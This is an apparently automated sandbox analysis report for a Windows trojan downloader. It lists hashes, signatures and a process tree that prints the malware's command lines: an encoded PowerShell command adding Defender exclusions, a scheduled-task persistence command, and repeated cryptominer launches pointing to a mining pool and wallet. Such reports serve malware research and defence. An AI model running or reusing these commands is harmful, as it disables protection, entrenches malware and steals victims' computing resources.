Analysis
-
max time kernel
143s -
max time network
98s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
20-05-2022 08:00
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe
Resource
win7-20220414-en
General
-
Target
SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe
-
Size
4.8MB
-
MD5
b4aa27a1339c69d99121a4fe4fac94f7
-
SHA1
72cd9ebfd59e9c5a45c22dd5f6aa8d4cb9ba9d26
-
SHA256
a738f6016086abdd2824b797ec67feee3bc39d52b0b0ae94bd1384c58ed3d5d6
-
SHA512
3550565464695370bdc761327eea1502e523a8b5f5780c6d7942e2be480d40a262897009c6e459110ac0b146ad05f69f9c7d099ad88eaca39975907f95d3e184
Malware Config
Signatures
-
Processes:
resource yara_rule behavioral1/memory/1272-65-0x00000000FF330000-0x00000000FFB1C000-memory.dmp upx behavioral1/memory/1272-67-0x00000000FF330000-0x00000000FFB1C000-memory.dmp upx behavioral1/memory/1272-69-0x00000000FF330000-0x00000000FFB1C000-memory.dmp upx behavioral1/memory/1272-71-0x00000000FF330000-0x00000000FFB1C000-memory.dmp upx behavioral1/memory/1272-72-0x00000000FF330000-0x00000000FFB1C000-memory.dmp upx -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 40 IoCs
Processes:
SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exedescription pid process target process PID 1728 set thread context of 1272 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 1688 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 1068 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 756 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 1692 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 1384 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 1952 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 884 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 1856 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 1876 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 1392 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 1396 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 1048 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 1468 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 532 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 840 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 604 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 540 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 1456 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 2040 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 1896 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 1252 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 548 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 960 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 1088 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 304 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 528 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 1128 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 1872 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 1284 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 856 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 888 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 1536 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 1748 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 940 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 648 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 1512 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 1572 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 1716 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 set thread context of 392 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
Processes:
description flow ioc HTTP User-Agent header 4 Go-http-client/1.1 -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1632 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1632 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
SecuriteInfo.com.Trojan.DownLoader44.59135.30418.execmd.exedescription pid process target process PID 1728 wrote to memory of 940 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe cmd.exe PID 1728 wrote to memory of 940 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe cmd.exe PID 1728 wrote to memory of 940 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe cmd.exe PID 940 wrote to memory of 1632 940 cmd.exe powershell.exe PID 940 wrote to memory of 1632 940 cmd.exe powershell.exe PID 940 wrote to memory of 1632 940 cmd.exe powershell.exe PID 1728 wrote to memory of 568 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe schtasks.exe PID 1728 wrote to memory of 568 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe schtasks.exe PID 1728 wrote to memory of 568 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe schtasks.exe PID 1728 wrote to memory of 1272 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1272 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1272 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1272 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1272 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1272 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1272 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1688 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1688 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1688 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1688 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1688 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1688 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1688 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1068 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1068 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1068 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1068 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1068 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1068 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1068 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 756 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 756 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 756 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 756 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 756 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 756 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 756 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1692 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1692 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1692 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1692 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1692 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1692 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1692 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1384 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1384 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1384 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1384 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1384 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1384 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1384 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1952 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1952 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1952 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1952 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1952 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1952 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 1952 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 884 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 884 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 884 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 884 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 884 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe PID 1728 wrote to memory of 884 1728 SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.DownLoader44.59135.30418.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjADgAMABkADYANgA5AGMAYwBlAGYAOQA4ADQAZgA2ADkAOQBjADkAMgA0AGUAYQA4ADgAOABiADcAYQBhAGEAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADQAOABhAGYAOAA1AGMAMgBlAGIANAAzADQAZgBkADQAYgA4ADEAYQBhADMAYwAxAGUANwBkADcAYgBiADQANAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMANwBjAGQAYwBkADcAZgAwAGIAYwAyADQANAA4ADMANABhADYANgBlADkAOQBmADcAMwBlADcAZQA1AGQAMgA5ACMAPgAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjADMAZAAwADgAZABmAGMAYgAzADYAYgAyADQAOQA4ADcAOQBmAGIAZAAwAGEANwBjADEAZABlADgAMgAyADgANAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA5ADIANgBlADIAYgBhAGQAMQBiAGYAMQA0ADkAMQA2ADkAYwA3AGMAMwAxAGIAZQBkAGUAZgAzADcANgBmADgAIwA+AA=="2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjADgAMABkADYANgA5AGMAYwBlAGYAOQA4ADQAZgA2ADkAOQBjADkAMgA0AGUAYQA4ADgAOABiADcAYQBhAGEAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADQAOABhAGYAOAA1AGMAMgBlAGIANAAzADQAZgBkADQAYgA4ADEAYQBhADMAYwAxAGUANwBkADcAYgBiADQANAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMANwBjAGQAYwBkADcAZgAwAGIAYwAyADQANAA4ADMANABhADYANgBlADkAOQBmADcAMwBlADcAZQA1AGQAMgA5ACMAPgAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjADMAZAAwADgAZABmAGMAYgAzADYAYgAyADQAOQA4ADcAOQBmAGIAZAAwAGEANwBjADEAZABlADgAMgAyADgANAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA5ADIANgBlADIAYgBhAGQAMQBiAGYAMQA0ADkAMQA2ADkAYwA3AGMAMwAxAGIAZQBkAGUAZgAzADcANgBmADgAIwA+AA=="3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exeschtasks /create /sc minute /mo 1 /tn "Runtime Broker" /rl HIGHEST /tr "C:\Users\Admin\AppData\Roaming\Runtime Broker\Runtime Broker"2⤵
- Creates scheduled task(s)
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x2⤵
-
